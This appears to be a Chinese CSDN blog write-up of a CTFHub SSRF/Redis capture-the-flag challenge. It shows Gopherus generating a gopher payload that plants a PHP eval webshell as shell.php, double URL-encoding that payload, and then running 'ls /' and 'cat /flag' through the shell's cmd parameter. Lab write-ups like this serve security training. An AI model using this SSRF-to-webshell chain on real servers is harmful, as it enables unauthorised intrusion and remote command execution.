CTFHUB-SSRF-Redis协议

本题需要用到:

在线编码网址:https://icyberchef.com/

gopherus工具链接: Gopherus工具的下载、使用-CSDN博客

开启题目,页面空白

和上一个题FastCGI协议一样,还是使用gopherus攻击redis

./gopherus.py --exploit redis
第二行默认是/var/www/html,可以不输直接回车
<?php eval($_post["123"]);?>

得到了这些, 发现已经自动把%0a转换成%0d%0a了,我们对他二次编码

编码后的这一串放进url访问,等了很久,他返回504超时了,但是应该传上去了,使用蚁剑连接,位置是shell.php,使用蚁剑连接没有连上去,不知道为什么,那就换一种方法

回到刚才第一步,除了第一步选择PHPShell,其他都默认,默认文件名为shell.php,默认命令参数是cmd

得到了编码,对它再进行一次编码

放入url访问,等了很久还是返回504

访问shell.php成功了 ,url写入

shell.php/?cmd=ls /

看到了flag,cat读取flag,就得到了我们需要的flag

shell.php/?cmd=cat /flag_b22135bb6e61395d1e90b103e7cf760f

  • 12
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值